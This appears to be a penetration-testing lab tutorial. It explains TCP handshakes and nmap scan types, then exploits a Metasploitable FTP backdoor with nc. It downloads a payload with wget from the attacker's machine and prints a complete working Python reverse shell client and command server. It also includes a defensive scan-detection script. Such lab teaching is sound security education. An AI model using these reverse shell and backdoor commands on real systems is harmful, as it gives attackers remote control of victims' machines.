How a file is converted into packets with sequence numbers
Before a file can be transmitted, it must be encapsulated into a packet. However, TCP packets have a maximum size of 64KB, so files larger than this are divided and placed into several TCP packets.
Each packet is assigned a sequence number so that the file can be reassembled.
Sequence numbers are consecutive, which allows the recipient to determine the proper order in which to interpret the packets; however, each machine starts the sequence with a random number to keep hackers from predicting the sequence.
Before two machines can transmit their packets, they must both receive and acknowledge the other machine's starting sequence number so that they can keep track of any lost packets. This exchange is called the TCP three-way handshake.
When the systems have finished exchanging packets, they close the connection by exchanging FIN and ACK packets.
Firewalls prevent machines outside the network from initiating connections to servers inside the network.
However, many firewalls allow the reverse: machines inside the network can still initiate connections to machines outside the network.
How firewalls and NAT block incoming connections but not outgoing ones
A reverse shell consists of two parts: a component that connects to the attacker's computer, and a shell component that allows an attacker to execute terminal commands on the victim's machine.
The IANA service-name and port-number registry maps port numbers to their associated services: https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml
Scanning for Open Ports
nmap -sV 192.168.1.101
nmap performs a SYN scan by default. Instead of establishing a full connection, a SYN scan sends TCP SYN packets, listens for SYN/ACK responses and marks a port as open if it receives one.
The -sS flag selects the SYN scan explicitly:
nmap -sS <Metasploitable IP address>
A FIN scan (-sF) uses TCP FIN packets instead of SYN packets to bypass some firewall protections:
nmap -sF <Metasploitable IP address>
An XMas scan sets the FIN, PSH, and URG flags in the TCP packet. The PSH and URG flags are rarely used, and systems often contain incomplete or incorrect implementations of the TCP/IP standard that don't handle them uniformly. By examining how a system responds to these flags, an attacker can infer information about the TCP/IP implementation and learn about the system.
nmap -sX <Metasploitable IP address>
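The same flag combinations are what a defender looks for in captured traffic. The following Python is an added example, not part of the original notes: it classifies TCP probes by their flag set (SYN, FIN and Xmas as described above) and reports any source that swept several ports of one host. The packet records are constructed for illustration, and port_threshold is an assumed tuning value.

```python
from collections import defaultdict

# Flag sets that match the nmap scan types described above.
FLAG_SIGNATURES = {
    "SYN scan": frozenset({"SYN"}),
    "FIN scan": frozenset({"FIN"}),
    "Xmas scan": frozenset({"FIN", "PSH", "URG"}),
}

def classify_probe(flags):
    """Return the scan type whose flag set exactly matches this packet's
    flags, or None. A lone SYN is also how every normal connection starts,
    so it only counts as a scan once one source sweeps many ports."""
    flagset = frozenset(flags)
    for label, signature in FLAG_SIGNATURES.items():
        if flagset == signature:
            return label
    return None

def detect_sweeps(packets, port_threshold=3):
    """Group probe packets by (source, destination, scan type) and return the
    groups that touched at least port_threshold distinct destination ports.
    Each packet is a tuple (src_ip, dst_ip, dst_port, flags)."""
    touched = defaultdict(set)
    for src, dst, dport, flags in packets:
        label = classify_probe(flags)
        if label is not None:
            touched[(src, dst, label)].add(dport)
    return {key: sorted(ports) for key, ports in touched.items()
            if len(ports) >= port_threshold}

# Constructed sample capture (not real traffic): one SYN sweep, one Xmas
# sweep, a single FIN probe, and an ordinary HTTP client connection.
SAMPLE_PACKETS = [
    ("10.0.0.5", "10.0.0.20", 21, {"SYN"}),
    ("10.0.0.5", "10.0.0.20", 22, {"SYN"}),
    ("10.0.0.5", "10.0.0.20", 80, {"SYN"}),
    ("10.0.0.5", "10.0.0.20", 443, {"SYN"}),
    ("10.0.0.9", "10.0.0.20", 21, {"FIN", "PSH", "URG"}),
    ("10.0.0.9", "10.0.0.20", 22, {"FIN", "PSH", "URG"}),
    ("10.0.0.9", "10.0.0.20", 6200, {"FIN", "PSH", "URG"}),
    ("10.0.0.9", "10.0.0.20", 21, {"FIN"}),
    ("10.0.0.7", "10.0.0.20", 80, {"SYN"}),
    ("10.0.0.7", "10.0.0.20", 80, {"ACK"}),
    ("10.0.0.7", "10.0.0.20", 80, {"PSH", "ACK"}),
]

if __name__ == "__main__":
    for (src, dst, label), ports in detect_sweeps(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}: {label} across ports {ports}")
```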
Exploiting a Vulnerable Service
Known vulnerabilities in a service are catalogued in the National Vulnerability Database at https://nvd.nist.gov/. Not every vulnerability is listed there, however; in these cases, an attacker will need to discover an unknown vulnerability. These are called zero-day vulnerabilities because the victim is unaware of them and so has zero days to fix them.
python -m http.server 8000
# Note: in Python 2 the equivalent is
python -m SimpleHTTPServer 8000
Writing a Reverse Shell Client
reverseShell.py

    import sys
    from subprocess import Popen, PIPE
    from socket import *

    serverName = sys.argv[1]   # ➊ attacker host, given on the command line
    serverPort = 8000
    # Create an IPv4 (AF_INET), TCP (SOCK_STREAM) socket
    clientSocket = socket(AF_INET, SOCK_STREAM)   # ➋
    clientSocket.connect((serverName, serverPort))   # ➌
    clientSocket.send('Bot reporting for duty'.encode())
    command = clientSocket.recv(4064).decode()   # ➍
    while command != "exit":   # ➎
        # Run the received command as a subprocess and capture its output
        proc = Popen(command.split(" "), stdout=PIPE, stderr=PIPE)   # ➏
        result, err = proc.communicate()   # ➐ wait for the command to finish
        clientSocket.send(result)
        command = (clientSocket.recv(4064)).decode()
    clientSocket.close()
The Popen method ➏ creates a copy, or fork, of the current process, called a subprocess, in which the received command runs.
Writing a TCP Server That Listens for Client Connections
shellServer.py

    from socket import *

    serverPort = 8000
    serverSocket = socket(AF_INET, SOCK_STREAM)   # ➊
    # Allow the port to be reused right after a previous run of the server
    serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)   # ➋
    serverSocket.bind(('', serverPort))   # ➌ bind to every local interface
    serverSocket.listen(1)   # ➍
    print("Attacker box listening and awaiting instructions")
    connectionSocket, addr = serverSocket.accept()   # ➎ block until a client connects
    print("Thanks for connecting to me " + str(addr))
    message = connectionSocket.recv(1024)
    print(message)
    command = ""
    while command != "exit":
        command = input("Please enter a command: ")
        connectionSocket.send(command.encode())
        message = connectionSocket.recv(1024).decode()
        print(message)
    connectionSocket.shutdown(SHUT_RDWR)   # ➏
    connectionSocket.close()
Start the server:
python3 ~/Desktop/shell/shellServer.py
Loading the Reverse Shell onto the Metasploitable Server
python3 -m http.server 8080
nc <Metasploitable IP address> 21
user Hacker:)
pass invalid
nc <Metasploitable IP address> 6200
mkdir shell
cd shell
wget <Kali IP>:8080/reverseShell.py
Start the reverse shell on the Metasploitable machine:
python reverseShell.py <Kali IP address> &
Switch over to the Kali Linux machine and try executing a command: